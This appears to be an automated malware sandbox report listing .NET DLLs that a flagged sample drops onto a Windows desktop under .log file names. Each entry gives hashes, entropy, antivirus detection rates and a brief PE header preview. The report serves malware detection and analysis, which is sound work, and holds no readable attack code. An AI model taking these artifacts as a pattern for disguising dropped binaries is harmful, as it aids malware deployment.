Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FOzUwYyz.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FeLEeCSo.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FuAUYlaa.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FvgOgdlp.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FxxLTNKF.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GBZNzENY.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GLflDjTD.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GTPDiSuI.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GYueqmCN.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\GhHLDCKr.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GrbctlpV.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\GyndizDU.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\HejUYCZm.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HzekDlJr.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\IEuUpfEB.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IhuDGjiQ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ImrlTNzS.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IrnfaqBK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\IySxBMpl.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JcGsBzAN.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JgaLgwjq.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JjTtpNNN.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
